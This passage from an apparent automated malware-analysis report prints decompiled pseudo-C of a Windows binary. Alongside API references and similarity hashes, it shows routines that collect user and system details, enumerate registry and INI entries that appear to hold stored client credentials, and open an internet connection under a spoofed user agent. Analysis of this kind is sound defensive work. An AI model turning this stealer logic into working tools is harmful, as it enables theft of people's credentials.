				signed int _t65;
				signed short _t71;
				signed short _t75;
				void* _t92;
				void* _t95;
				void* _t97;
				signed short _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t109;
				signed int _t111;
				char* _t112;
				void* _t113;

				_t109 = __edx;
				_t106 = __ecx;
				_t111 = _a4;
				_t114 =  *_t111;
				_t99 = 1;
				_v5 = 0;
				if( *_t111 == 0) {
					_t97 = E004172A2(_t114);
					 *_t111 = _t97;
					if(_t97 == 0) {
						return 0;
					}
					_v5 = 1;
				}
				__eflags = _a8 & 0x00000001;
				if((_a8 & 0x00000001) == 0) {
					L9:
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) != 0) {
						_push( &_v12);
						_push(0x20000);
						_push(0x2713);
						_t105 = 4;
						_v12 = 0x3030303;
						_t99 = E004172B6(_t111, _t105);
					}
					L11:
					__eflags = _a8 & 0x00000004;
					if((_a8 & 0x00000004) == 0) {
						L16:
						__eflags = _t99;
						if(_t99 == 0) {
							L32:
							__eflags = _v5 - 1;
							if(_v5 == 1) {
								E004119C1( *_t111);
								 *_t111 =  *_t111 & 0x00000000;
								__eflags =  *_t111;
							}
							L34:
							return _t99;
						}
						__eflags = _a8 & 0x00000008;
						if((_a8 & 0x00000008) == 0) {
							L20:
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							}
							__eflags = _a8 & 0x00000010;
							if((_a8 & 0x00000010) == 0) {
								L28:
								__eflags = _t99;
								if(_t99 == 0) {
									goto L32;
								}
								__eflags = _a8 & 0x00000020;
								if((_a8 & 0x00000020) != 0) {
									E0040AF25(_t106, _t111, 2);
									E0040AF25(_t106, _t111, 0x17);
								}
								goto L34;
							}
							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
							_a4 = _t62;
							__eflags = _t62;
							if(_t62 != 0) {
								__eflags = 0;
								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
								_t106 =  &_v588;
								_t99 = E00417363(_t62,  &_v588, _t109, 0, _t111, 0x271e);
							}
							_a4 = 0x104;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							} else {
								_t64 =  &_v588;
								__imp__GetUserNameExW(2, _t64,  &_a4);
								__eflags = _t64;
								if(_t64 != 0) {
									_t65 = _a4;
									__eflags = _t65;
									if(_t65 != 0) {
										__eflags = 0;
										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
										_t106 =  &_v588;
										_t99 = E00417363(_t65,  &_v588, _t109, 0, _t111, 0x271f);
									}
								}
								goto L28;
							}
						}
						_t112 =  &_v20;
						E0041D883(_t112);
						_push(_t112);
						_push(0x20000);
						_push(0x271c);
						_t100 = 6;
						_t71 = E004172B6(_a4, _t100);
						_t99 = _t71;
						__eflags = _t99;
						if(_t99 == 0) {
							_t111 = _a4;
							goto L32;
						}
						__imp__GetUserDefaultUILanguage();
						_v12 = _t71 & 0x0000ffff;
						_push( &_v12);
						_push(0x20000);
						_push(0x271d);
						_t101 = 2;
						_t75 = E004172B6(_a4, _t101);
						_t111 = _a4;
						_t99 = _t75;
						goto L20;
					}
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E00411AC3();
					_push( &_v12);
					_push(0x20000);
					_push(0x2719);
					_t102 = 4;
					_t99 = E004172B6(_t111, _t102);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E00411AEB();
					_push( &_v12);
					_push(0x20000);
					_push(0x271b);
					_t103 = 4;
					_t99 = E004172B6(_t111, _t103);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = GetTickCount();
					_push( &_v12);
					_push(0x20000);
					_push(0x271a);
					_t104 = 4;
					_t99 = E004172B6(_t111, _t104);
					goto L16;
				}
				_t92 = E00406619(_t106,  &_v556);
				_t106 =  &_v552;
				_t99 = E00417363(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				_t95 = E00406779( &_v552,  &_v64);
				__eflags = _v64;
				if(__eflags != 0) {
					_t106 =  &_v64;
					_t99 = E00417363(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
				}
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				goto L9;
			}

0x0040afd9
0x0040afd9
0x0040afe4
0x0040afe7
0x0040afeb
0x0040afed
0x0040aff1
0x0040aff3
0x0040aff8
0x0040affc
0x00000000
0x0040affe
0x0040b005
0x0040b005
0x0040b009
0x0040b012
0x0040b05b
0x0040b05b
0x0040b05f
0x0040b064
0x0040b065
0x0040b066
0x0040b06d
0x0040b070
0x0040b07c
0x0040b07c
0x0040b07e
0x0040b07e
0x0040b082
0x0040b0f7
0x0040b0f7
0x0040b0f9
0x0040b1fc
0x0040b1fc
0x0040b200
0x0040b204
0x0040b209
0x0040b209
0x0040b209
0x0040b20c
0x00000000
0x0040b20c
0x0040b0ff
0x0040b103
0x0040b151
0x0040b151
0x0040b153
0x00000000
0x00000000
0x0040b159
0x0040b15d
0x0040b1dd
0x0040b1dd
0x0040b1df
0x00000000
0x00000000
0x0040b1e1
0x0040b1e5
0x0040b1ea
0x0040b1f2
0x0040b1f2
0x00000000
0x0040b1e5
0x0040b16d
0x0040b173
0x0040b176
0x0040b178
0x0040b17a
0x0040b181
0x0040b18a
0x0040b195
0x0040b195
0x0040b197
0x0040b19e
0x0040b1a0
0x00000000
0x0040b1a2
0x0040b1a6
0x0040b1af
0x0040b1b5
0x0040b1b7
0x0040b1b9
0x0040b1bc
0x0040b1be
0x0040b1c0
0x0040b1c7
0x0040b1d0
0x0040b1db
0x0040b1db
0x0040b1be
0x00000000
0x0040b1b7
0x0040b1a0
0x0040b105
0x0040b108
0x0040b10f
0x0040b113
0x0040b114
0x0040b11b
0x0040b11c
0x0040b121
0x0040b123
0x0040b125
0x0040b1f9
0x00000000
0x0040b1f9
0x0040b12b
0x0040b134
0x0040b13a
0x0040b13e
0x0040b13f
0x0040b146
0x0040b147
0x0040b14c
0x0040b14f
0x00000000
0x0040b14f
0x0040b084
0x0040b086
0x00000000
0x00000000
0x0040b091
0x0040b097
0x0040b098
0x0040b099
0x0040b0a0
0x0040b0a8
0x0040b0aa
0x0040b0ac
0x00000000
0x00000000
0x0040b0b7
0x0040b0bd
0x0040b0be
0x0040b0bf
0x0040b0c6
0x0040b0ce
0x0040b0d0
0x0040b0d2
0x00000000
0x00000000
0x0040b0de
0x0040b0e4
0x0040b0e5
0x0040b0e6
0x0040b0ed
0x0040b0f5
0x00000000
0x0040b0f5
0x0040b01b
0x0040b026
0x0040b031
0x0040b033
0x0040b035
0x00000000
0x00000000
0x0040b03b
0x0040b040
0x0040b045
0x0040b04d
0x0040b055
0x0040b055
0x0040b057
0x0040b059
0x00000000
0x00000000
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040B0D8
GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,?,?,00000000), ref: 0040B12B
GetModuleFileNameW.KERNEL32(00000000,?,00000103,?,?,00000000), ref: 0040B16D
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 0040B1AF

Strings

, xrefs: 0040B1E1

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: NameUser$CountDefaultFileLanguageModuleTick
String ID:
API String ID: 2256650695-3916222277
Opcode ID: 15a1e247717c04fccdb6f149d7632e59d9a493815e60f1351d640f8e7abf5aed
Instruction ID: 88ee206afabb01ba604ee2e06d395ac39e173a6f6957a00777527390dd7b55bb
Opcode Fuzzy Hash: 15a1e247717c04fccdb6f149d7632e59d9a493815e60f1351d640f8e7abf5aed
Instruction Fuzzy Hash: 8551F731A452487AD7209B55D859FDE3BB8EF02344F04406ABD44AF2D2DB788A85D7DC

Uniqueness

Uniqueness Score: -1.00%

Function 0041D902, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0041D902(void* _a4, WCHAR* _a8) {
				char _v40;
				char _v160;
				char _v680;
				void* __edi;
				void* __esi;
				void** _t11;
				void* _t13;
				void* _t16;
				void* _t18;
				void* _t23;
				void* _t28;
				void* _t30;
				WCHAR* _t34;

				_t11 =  &_a4;
				_t28 = 0;
				__imp__ConvertSidToStringSidW(_a4, _t11);
				if(_t11 != 0) {
					_t37 =  &_v160;
					_t13 = 4;
					E00419DD3(_t13,  &_v160);
					_push(_a4);
					_t34 =  &_v680;
					_t16 = E004126B4(_t37, 0x104, _t34, _t37);
					_pop(_t30);
					if(_t16 > 0) {
						_t18 = 5;
						E00419DD3(_t18,  &_v40);
						_t23 = E00415AE5(0x80000002, _t30, _t34, _t34,  &_v40, 0x104);
						if(_t23 != 0 && _t23 != 0xffffffff) {
							PathUnquoteSpacesW(_t34);
							ExpandEnvironmentStringsW(_t34, _a8, 0x104);
							asm("sbb bl, bl");
							_t28 = 1;
						}
					}
					LocalFree(_a4);
				}
				return _t28;
			}

0x0041d90c
0x0041d913
0x0041d915
0x0041d91d
0x0041d927
0x0041d92d
0x0041d92e
0x0041d933
0x0041d93e
0x0041d944
0x0041d94a
0x0041d94d
0x0041d954
0x0041d955
0x0041d96c
0x0041d973
0x0041d97d
0x0041d98a
0x0041d996
0x0041d998
0x0041d998
0x0041d973
0x0041d99d
0x0041d9a4
0x0041d9a9

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 0041D915
LocalFree.KERNEL32(?,.exe,00000000), ref: 0041D99D

Part of subcall function 00415AE5: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D971,?,?,00000104,.exe,00000000), ref: 00415AFA

PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,.exe,00000000), ref: 0041D97D
ExpandEnvironmentStringsW.KERNEL32(?,0041CE32,00000104), ref: 0041D98A

Strings

.exe, xrefs: 0041D924

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
String ID: .exe
API String ID: 2200435814-4119554291
Opcode ID: 426ed9fe809456546324aa3df8bf0bbaeacf24ec12d67cb4ac33d98e91444d44
Instruction ID: 5779027b664e0ec7363753f3d7a6b2cbd4cfa4a6117f579856dec3f00a80381e
Opcode Fuzzy Hash: 426ed9fe809456546324aa3df8bf0bbaeacf24ec12d67cb4ac33d98e91444d44
Instruction Fuzzy Hash: 7D11C6B2A40114ABDF106B79ED09FCB7BADDF45324F040426F949E71A0D778D984CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041AB48, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 47
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041AB48(void* __edx) {
				void _v108;
				char _v120;
				char _v212;
				long _v216;
				char _v224;
				void* __esi;
				void* _t8;
				void* _t16;

				_t16 = __edx;
				_t8 = GetThreadDesktop(GetCurrentThreadId());
				if(_t8 != 0) {
					_t8 = GetUserObjectInformationW(_t8, 2,  &_v108, 0x64,  &_v216);
					if(_t8 != 0 && _v216 == 0x4e) {
						E00406312(0x2937498d,  &_v212, 0);
						_t8 = E00411A32( &_v224,  &_v120, 0x4c);
						if(_t8 == 0) {
							_t8 = E0041A756( &_v120, _t16, 0x423e78, _t8);
							if(_t8 == 0) {
								_t8 = E0041A9C1(0x423e78, 0);
							} else {
								 *0x422530 =  *0x422530 | 0x00000004;
							}
						}
					}
				}
				return _t8;
			}

0x0041ab48
0x0041ab5c
0x0041ab64
0x0041ab75
0x0041ab7d
0x0041ab92
0x0041aba1
0x0041aba8
0x0041abb0
0x0041abb7
0x0041abc6
0x0041abb9
0x0041abb9
0x0041abb9
0x0041abb7
0x0041aba8
0x0041ab7d
0x0041abcf

APIs

GetCurrentThreadId.KERNEL32 ref: 0041AB55
GetThreadDesktop.USER32(00000000), ref: 0041AB5C
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0041AB75

Part of subcall function 0041A756: TlsAlloc.KERNEL32(00423E78,00000000,0000018C,00000000,00000000), ref: 0041A76F

Strings

N, xrefs: 0041AB7F
x>B, xrefs: 0041ABAB

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$AllocCurrentDesktopInformationObjectUser
String ID: N$x>B
API String ID: 454308152-2370055029
Opcode ID: 201f865a1e8fb0e806ffa824f4e70a37f6a6c1613a9b75376d82c28111129064
Instruction ID: ac1a0502af23f950b7c9d81ac66166bd2567602b03e68303f6107b7bb058163e
Opcode Fuzzy Hash: 201f865a1e8fb0e806ffa824f4e70a37f6a6c1613a9b75376d82c28111129064
Instruction Fuzzy Hash: 8B01D4706093006EE610AB609E46FEB339D5B40718F40452FBB25D21E0EB78E954D65F

Uniqueness

Uniqueness Score: -1.00%

Function 00413595, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413595(signed int __eax, char* __ecx) {
				short _v28;
				char* _v32;
				signed int _t5;
				void* _t12;
				void* _t14;
				char* _t15;
				void* _t18;

				_t15 = __ecx;
				_t5 = __eax;
				if(__ecx == 0) {
					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
				}
				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
				if(_t14 == 0) {
					L7:
					return 0;
				}
				_t18 = 0;
				do {
					_t1 = _t18 + 0x422394; // 0x422394
					_t2 = _t18 + 0x422390; // 0x2
					InternetSetOptionA(_t14,  *_t2, _t1, 4);
					_t18 = _t18 + 8;
				} while (_t18 < 0x18);
				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
				if(_t12 == 0) {
					InternetCloseHandle(_t14);
					goto L7;
				}
				return _t12;
			}

0x00413595
0x00413595
0x0041359b
0x0041359d
0x0041359d
0x004135b2
0x004135b6
0x004135fa
0x00000000
0x004135fa
0x004135b9
0x004135bb
0x004135bd
0x004135c4
0x004135cb
0x004135d1
0x004135d4
0x004135e8
0x004135f1
0x004135f4
0x00000000
0x004135f4
0x004135fe

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 004135AC
InternetSetOptionA.WININET(00000000,00000002,00422394,00000004), ref: 004135CB
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004135E8
InternetCloseHandle.WININET(00000000), ref: 004135F4

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 0041359D, 004135AB

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseConnectHandleOpenOption
String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
API String ID: 910987326-3737944857
Opcode ID: 3d4977c91c12fc1b85036e1bf0d7762210b642958b115708095a136a52e5c555
Instruction ID: e523c1da5d0168752961d706772e3f57377368c23ca1a1a97ab279cf021e6cce
Opcode Fuzzy Hash: 3d4977c91c12fc1b85036e1bf0d7762210b642958b115708095a136a52e5c555
Instruction Fuzzy Hash: 6BF096722006107ED6225B725D8CDAB7E6EEBCAB52B04082DF657E5121C6358A50877C

Uniqueness

Uniqueness Score: -1.00%

Function 00413A09, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00413A09() {
				char _v8;
				struct HINSTANCE__* _v12;
				void* _v1036;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t15;
				char _t22;
				void* _t28;

				_t22 = 0;
				_t13 = LoadLibraryA("urlmon.dll");
				_v12 = _t13;
				if(_t13 != 0) {
					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
					if(_t15 != 0) {
						_push( &_v8);
						_push( &_v1036);
						_push(0);
						_v8 = 0x3ff;
						_v1036 = 0;
						if( *_t15() == 0) {
							if(_v8 > 0x3ff) {
								_v8 = 0x3ff;
							}
							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
							_t22 = E00411E1F( &_v1036 | 0xffffffff,  &_v1036);
						}
					}
					FreeLibrary(_v12);
				}
				return _t22;
			}

0x00413a18
0x00413a1a
0x00413a20
0x00413a25
0x00413a2d
0x00413a35
0x00413a3b
0x00413a42
0x00413a48
0x00413a49
0x00413a4c
0x00413a56
0x00413a5b
0x00413a5d
0x00413a5d
0x00413a63
0x00413a79
0x00413a79
0x00413a7b
0x00413a7f
0x00413a7f
0x00413a89

APIs

LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 00413A1A
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00413A2D
FreeLibrary.KERNEL32(?), ref: 00413A7F

Strings

urlmon.dll, xrefs: 00413A13
ObtainUserAgentString, xrefs: 00413A27

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadProc
String ID: ObtainUserAgentString$urlmon.dll
API String ID: 145871493-2685262326
Opcode ID: 2607c35178cd2354c94d34c1be55b4b1ed04ec08e7fc337da61f7c48b806f20b
Instruction ID: 74fa1793cde658bee29f72531e51ecb6400d9850638d0d2050f1a3d429e9cb23
Opcode Fuzzy Hash: 2607c35178cd2354c94d34c1be55b4b1ed04ec08e7fc337da61f7c48b806f20b
Instruction Fuzzy Hash: 0C0125B1940214ABCB10EFE89D845DE7A78AF18341F1005BEA655F3250D6748F848668

Uniqueness

Uniqueness Score: -1.00%

Function 0040EADD, Relevance: 7.7, APIs: 5, Instructions: 202
registryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040EADD(char* __ecx, void* __eflags) {
				int _v8;
				void* _v12;
				signed int _v16;
				char* _v20;
				intOrPtr _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				void* _v40;
				intOrPtr _v44;
				char* _v48;
				char _v60;
				char _v80;
				char _v100;
				char _v120;
				char _v152;
				char _v216;
				char _v284;
				short _v804;
				void* __edi;
				void* __esi;
				intOrPtr _t70;
				int _t102;
				int _t110;
				int _t114;
				void* _t115;
				signed int _t117;
				void* _t119;
				intOrPtr _t121;
				void* _t124;
				intOrPtr _t127;
				int _t134;
				intOrPtr _t136;
				char* _t138;
				char* _t141;
				signed int _t145;
				void* _t146;
				void* _t147;

				_t129 = __ecx;
				_t70 = E00411991(0xc08);
				_t127 = _t70;
				_t134 = 0;
				_v24 = _t127;
				if(_t127 == 0) {
					return _t70;
				} else {
					E00419DD3(0x83,  &_v216);
					_t141 =  &_v284;
					E00419DD3(0x84, _t141);
					_v48 =  &_v216;
					_v44 = _t141;
					E00411A74( &_v36,  &_v36, 0, 8);
					E00419DD3(0x85,  &_v120);
					E00419DD3(0x86,  &_v100);
					E00419DD3(0x87,  &_v60);
					_t145 =  &_v80;
					E00419DD3(0x88, _t145);
					_t12 = _t127 + 0x3fc; // 0x3fc
					_v20 = _t12;
					_v16 = 0;
					do {
						if(RegOpenKeyExW(0x80000001,  *(_t146 + _v16 * 4 - 0x2c), _t134, 8,  &_v12) != 0) {
							goto L22;
						}
						_v28 = _t134;
						_v8 = 0x104;
						if(RegEnumKeyExW(_v12, _t134,  &_v804,  &_v8, _t134, _t134, _t134, _t134) != 0) {
							L21:
							RegCloseKey(_v12);
							goto L22;
						} else {
							goto L4;
						}
						do {
							L4:
							_t136 = _v24;
							_v28 = _v28 + 1;
							_t102 = E00415AE5(_v12, _t129, _t136,  &_v804,  &_v120, 0xff);
							_t145 = _t145 | 0xffffffff;
							_v8 = _t102;
							if(_t102 != _t145 && _t102 != 0) {
								_t137 = _t136 + 0x1fe;
								_t110 = E00415AE5(_v12, _t129, _t136 + 0x1fe,  &_v804,  &_v100, 0xff);
								_v8 = _t110;
								if(_t110 == _t145 || _t110 == 0) {
									_t114 = E00415AE5(_v12, _t129, _t137,  &_v804,  &_v60, 0xff);
									_v8 = _t114;
									if(_t114 == _t145 || _t114 == 0) {
										goto L19;
									} else {
										goto L10;
									}
								} else {
									L10:
									_t115 = _v12;
									_t129 =  &_v804;
									_v40 = _t115;
									if(RegOpenKeyExW(_t115,  &_v804, 0, 1,  &_v40) != 0) {
										_t117 = _t145;
									} else {
										_t145 =  &_v40;
										_t117 = E00415C0D(_t145,  &_v80, _t116, _v20, 0xff);
									}
									_v8 = _t117;
									if(_t117 != 0xffffffff && _t117 != 0) {
										_t138 = _v20;
										if(E0040EA83(_t138) > 0) {
											_t145 =  &_v152;
											_t119 = 0x56;
											E00419DD3(_t119, _t145);
											_t121 = _v24;
											_push(_t121);
											_t129 = _t138;
											_push(_t129);
											_push(_t121 + 0x1fe);
											_t51 = _t129 + 0x1fe; // 0x1fe
											_t124 = E004126B4(_t145, 0x307, _t51, _t145);
											_t147 = _t147 + 0x10;
											if(_t124 > 0) {
												_t129 =  &_v36;
												if(E00411DB5(_t124,  &_v36, _v20 + 0x1fe) != 0) {
													_v32 = _v32 + 1;
												}
											}
										}
									}
									goto L19;
								}
							}
							L19:
							_v8 = 0x104;
						} while (RegEnumKeyExW(_v12, _v28,  &_v804,  &_v8, 0, 0, 0, 0) == 0);
						_t134 = 0;
						goto L21;
						L22:
						_v16 = _v16 + 1;
					} while (_v16 < 2);
					E004119C1(_v24);
					if(_v32 <= _t134) {
						return E004119C1(_v36);
					}
					return E0040C9F4(0x307, _v36, 0xcb);
				}
			}

0x0040eadd
0x0040eaee
0x0040eaf3
0x0040eaf5
0x0040eaf7
0x0040eafc
0x0040ed55
0x0040eb02
0x0040eb0d
0x0040eb12
0x0040eb1d
0x0040eb28
0x0040eb2f
0x0040eb37
0x0040eb44
0x0040eb51
0x0040eb5e
0x0040eb63
0x0040eb6b
0x0040eb70
0x0040eb76
0x0040eb79
0x0040eb81
0x0040eb9c
0x00000000
0x00000000
0x0040ebb5
0x0040ebb8
0x0040ebc7
0x0040ed12
0x0040ed15
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ebcd
0x0040ebcd
0x0040ebcd
0x0040ebd0
0x0040ebe2
0x0040ebe7
0x0040ebea
0x0040ebef
0x0040ec0c
0x0040ec12
0x0040ec17
0x0040ec1c
0x0040ec31
0x0040ec36
0x0040ec3b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ec49
0x0040ec49
0x0040ec49
0x0040ec54
0x0040ec5c
0x0040ec67
0x0040ec7c
0x0040ec69
0x0040ec6d
0x0040ec75
0x0040ec75
0x0040ec7e
0x0040ec84
0x0040ec8a
0x0040ec94
0x0040ec98
0x0040ec9e
0x0040ec9f
0x0040eca4
0x0040eca7
0x0040eca8
0x0040ecaa
0x0040ecb0
0x0040ecb9
0x0040ecbf
0x0040ecc4
0x0040ecc9
0x0040ecd5
0x0040ecdf
0x0040ece1
0x0040ece1
0x0040ecdf
0x0040ecc9
0x0040ec94
0x00000000
0x0040ec84
0x0040ec1c
0x0040ece4
0x0040ecf8
0x0040ed08
0x0040ed10
0x00000000
0x0040ed1b
0x0040ed1b
0x0040ed1e
0x0040ed2b
0x0040ed33
0x00000000
0x0040ed4c
0x00000000
0x0040ed42

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 0040EB94
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 0040EBBF
RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 0040ED15

Part of subcall function 00415AE5: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D971,?,?,00000104,.exe,00000000), ref: 00415AFA

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 0040ED02

Part of subcall function 00415AE5: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041D971,?,?,00000104), ref: 00415B7B

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF,?,00000000), ref: 0040EC5F

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 6625f42b2e4d9c27ca2adf17ae9b3461267292e1ce3be79b9ece2b266292b774
Instruction ID: 6686b7a46b6ee8edd53aa28c110ce1cbdbe06f0753941bae5a2adf21f5ba193c
Opcode Fuzzy Hash: 6625f42b2e4d9c27ca2adf17ae9b3461267292e1ce3be79b9ece2b266292b774
Instruction Fuzzy Hash: F9715971900119ABEF10DBA6CD45AEFBBB8FF48304F14056AB610F3291DA399E85CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040DBA3, Relevance: 7.7, APIs: 5, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040DBA3(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				char _v564;
				short _v576;
				short _v588;
				short _v600;
				short _v608;
				WCHAR* _v612;
				WCHAR* _v616;
				WCHAR* _v620;
				WCHAR* _v624;
				WCHAR* _v628;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t51;
				WCHAR* _t54;
				WCHAR* _t56;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t63;
				long _t67;
				WCHAR* _t69;
				long _t77;
				long _t80;
				WCHAR* _t82;
				void* _t83;
				WCHAR* _t86;
				WCHAR* _t87;
				short* _t92;
				WCHAR* _t93;
				int _t102;
				WCHAR* _t107;
				intOrPtr _t114;
				signed int _t115;
				void* _t117;

				_t117 = (_t115 & 0xfffffff8) - 0x26c;
				if(E00417246( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L19:
					return 1;
				}
				_t120 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t107 = E00411991(0x1fffe);
					_v612 = _t107;
					__eflags = _t107;
					if(_t107 == 0) {
						goto L19;
					}
					_t51 = GetPrivateProfileStringW(0, 0, 0, _t107, 0xffff,  &_v524);
					__eflags = _t51;
					if(_t51 == 0) {
						L18:
						E004119C1(_t107);
						goto L19;
					}
					_t9 =  &(_t51[0]); // 0x1
					_t54 = E00412871(_t107, _t9);
					__eflags = _t54;
					if(_t54 == 0) {
						goto L18;
					}
					_t56 = E00411991(0xc1c);
					_v620 = _t56;
					__eflags = _t56;
					if(_t56 != 0) {
						_t11 =  &(_t56[0xff]); // 0x1fe
						_t92 = _t11;
						_v624 = _t107;
						_v616 = _t92;
						_t57 = 0x5c;
						_t93 =  &(_t92[0xff]);
						__eflags = _t93;
						E00419DD3(_t57,  &_v608);
						_t59 = 0x5d;
						E00419DD3(_t59,  &_v588);
						_t61 = 0x5e;
						E00419DD3(_t61,  &_v576);
						_t63 = 0x5f;
						E00419DD3(_t63,  &_v600);
						do {
							_t67 = GetPrivateProfileStringW(_v624,  &_v608, 0, _v620, 0xff,  &_v524);
							__eflags = _t67;
							if(_t67 != 0) {
								_t102 = GetPrivateProfileIntW(_v624,  &_v588, 0x15,  &_v524);
								_t25 = _t102 - 1; // -1
								__eflags = _t25 - 0xfffe;
								if(_t25 <= 0xfffe) {
									_t77 = GetPrivateProfileStringW(_v624,  &_v576, 0, _v616, 0xff,  &_v524);
									__eflags = _t77;
									if(_t77 != 0) {
										_t80 = GetPrivateProfileStringW(_v624,  &_v600, 0, _t93, 0xff,  &_v524);
										__eflags = _t80;
										if(_t80 != 0) {
											_t82 = E0040DA96(_v624, _t93);
											__eflags = _t82;
											if(_t82 > 0) {
												_t113 =  &_v564;
												_t83 = 0x55;
												E00419DD3(_t83,  &_v564);
												_push(_t102);
												_push(_v620);
												_push(_t93);
												_push(_v616);
												_t37 =  &(_t93[0xff]); // 0x1fe
												_t103 = _t37;
												_t86 = E004126B4(_t113, 0x311, _t37, _t113);
												_t117 = _t117 + 0x14;
												__eflags = _t86;
												if(_t86 > 0) {
